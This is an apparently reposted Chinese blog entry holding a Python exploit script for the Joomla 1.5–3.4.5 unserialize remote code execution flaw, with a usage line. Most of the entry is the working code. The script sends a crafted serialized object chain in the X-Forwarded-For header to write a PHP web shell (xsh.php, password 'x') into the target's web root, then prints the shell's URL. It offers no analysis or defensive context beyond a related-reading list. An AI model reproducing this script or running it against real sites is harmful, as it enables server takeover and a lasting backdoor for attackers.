• Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)

    Usage:x.py http://xxx.com

    # coding=utf-8
    # author:KuuKi
    # Help: joomla 1.5-3.4.5 unserialize remote code execution

    import urllib2
    import cookielib,sys
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    urllib2.socket.setdefaulttimeout(10)

    payload = 'file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."xsh.php","x3C".chr(63)."@eval(x5Cx24_POST[x]);")'

    forward = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"x5C0x5C0x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:' + str(len(payload)+28) + ':"' + payload + ';JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"x5C0x5C0x5C0connection";b:1;}xF0x9Dx8Cx86'
    req = urllib2.Request(url=sys.argv[1],headers={'x-forwarded-for':forward})
    opener.open(req)
    req = urllib2.Request(url=sys.argv[1])
    if 'SimplePie_Misc::parse_url' in opener.open(req).read():
        print 'Shell: '+ sys.argv[1] + '/xsh.php Password: x'
    else:
        print 'Unvunerable!'
  • 相关阅读:
    C++ | 变量缩写
    C++_数据类型和操作
    Python_pandas处理数据格式和统计频次
    C++_分离编译与Cmake
    C++_输入和输出示例
    C++字符串分割
    Pytorch_yoloV5预测数据非结构数据结构化
    Pytorch_模型部署和推断
    mysql触发器
    【分布式ID】雪花、TDDLSEQUENCE、UUID
  • 原文地址:https://www.cnblogs.com/milantgh/p/5193723.html
Copyright © 2020-2023  润新知